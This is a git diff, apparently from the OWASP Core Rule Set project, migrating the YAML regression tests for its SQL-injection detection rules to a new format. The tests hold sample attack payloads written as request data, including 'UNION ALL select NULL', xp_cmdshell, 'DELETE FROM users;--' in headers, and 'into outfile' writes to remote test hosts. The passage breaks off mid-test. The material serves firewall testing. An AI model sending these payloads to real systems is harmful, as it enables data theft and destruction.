127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get?gclid=j0KCQiA1NebBhDDARIsAANiDD3_RJeMv8zScF--mC1jf8fO8PDYJCxD9xdwT7iQ59QIIwL-86ncQtMaAh0lEALw_wcB" + output: + log: + no_expect_ids: [942440] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml index 7d32031..bf0f304 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml @@ -1,92 +1,90 @@ --- meta: author: "William Woodson, azurit" - description: None - enabled: true - name: 942450.yaml +rule_id: 942450 tests: - - test_title: 942450-1 + - test_id: 1 desc: "SQL Hex Encoding" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=%5c0xf00dsdfdsa" - version: HTTP/1.0 - output: - log_contains: id "942450" - - test_title: 942450-2 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=%5c0xf00dsdfdsa" + version: HTTP/1.0 + output: + log: + expect_ids: [942450] + - test_id: 2 desc: "SQL Hex Encoding" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" - version: HTTP/1.0 - output: - log_contains: id "942450" - - test_title: 942450-3 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" + version: HTTP/1.0 + output: + log: + expect_ids: [942450] + - test_id: 3 desc: "SQL Hex Encoding" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=select%200x616263" - version: HTTP/1.0 - output: - log_contains: id "942450" - - test_title: 942450-4 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=select%200x616263" + version: HTTP/1.0 + output: + log: + expect_ids: [942450] + - test_id: 4 desc: "SQL Hex Encoding - negative" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=IHRlc3Q0xAcF" - version: HTTP/1.0 - output: - no_log_contains: id "942450" - - test_title: 942450-5 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=IHRlc3Q0xAcF" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942450] + - test_id: 5 desc: "SQL Hex Encoding - negative" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" - version: HTTP/1.0 - output: - no_log_contains: id "942450" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942450] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml index 7d99328..9a2b72a 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml @@ -1,41 +1,39 @@ --- meta: author: "Franziska Bühler, azurit" - description: None - enabled: true - name: 942460.yaml +rule_id: 942460 tests: - - test_title: 942460-1 + - test_id: 1 desc: "Repetitive Non-Word Characters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=foo...." - version: HTTP/1.1 - output: - log_contains: id "942460" - - test_title: 942460-2 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=foo...." + version: HTTP/1.1 + output: + log: + expect_ids: [942460] + - test_id: 2 desc: "Repetitive Non-Word Characters negative test only 3 characters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=foo..." - version: HTTP/1.1 - output: - no_log_contains: id "942460" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=foo..." + version: HTTP/1.1 + output: + log: + no_expect_ids: [942460] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml index e2b679c..3496a13 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml @@ -1,193 +1,191 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942470.yaml +rule_id: 942470 tests: - - test_title: 942470-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=nvarchar" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=nvarchar" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 2 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xp_cmdshell" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xp_cmdshell" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 3 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=varchar" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=varchar" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 4 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xp_dirtree" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xp_dirtree" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 5 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xp_regread" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xp_regread" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 6 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sp_password" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sp_password" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 7 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=UTL_HTTP" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=UTL_HTTP" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 8 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=OPENROWSET" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=OPENROWSET" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 9 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sp_executesql" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sp_executesql" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 10 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "sp_executesql" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "sp_executesql" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 11 desc: "SQL Injection Attack: current_user" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=1%2bcurrent_user::int" - version: HTTP/1.0 - output: - log_contains: id "942470" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=1%2bcurrent_user::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml index af47b15..cf93c29 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml @@ -1,211 +1,209 @@ --- meta: author: "Jose Nazario, azurit" - description: None - enabled: true - name: 942480.yaml +rule_id: 942480 tests: - - test_title: 942480-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # variable name boundary attacks - uri: "/get?'msdasql'" - version: HTTP/1.0 - output: - log_contains: "id \"942480" - - test_title: 942480-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # variable name boundary attacks + uri: "/get?'msdasql'" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 2 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - # variable name boundary attacks - Cookie: "'msdasql'" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: "id \"942480" - - test_title: 942480-3 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + # variable name boundary attacks + Cookie: "'msdasql'" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 3 desc: "Data dump using 'into outfile'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 4 desc: "Data dump using 'into outfile'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 5 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=0.3480567293179807' UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=0.3480567293179807' UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 6 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=config.ini\") UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=config.ini\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 7 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=CRS) UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=CRS) UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 8 desc: "SQL injection using 'UNION ALL" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=CRS3\") UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=CRS3\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 9 desc: "SQL injection using 'overlay(...placing..)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 10 desc: "SQL injection in User-Agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: DELETE FROM users;-- - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 11 desc: "SQL injection in arbitrary header" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - SomeHeader: DELETE FROM users;-- - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + SomeHeader: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 12 desc: "SQL injection using 'overlay(...placing..) with newlines" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" - version: HTTP/1.0 - output: - log_contains: id "942480" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml index 0c5c8c4..910071c 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml @@ -1,381 +1,379 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942490.yaml +rule_id: 942490 tests: - - test_title: 942490-1 + - test_id: 1 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%22%60%20%2A%20123" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%22%60%20%2A%20123" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 2 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "' ', 10" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "' ', 10" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 3 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'', '', '', '', '', '', '', '', 13" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'', '', '', '', '', '', '', '', 13" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 4 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - 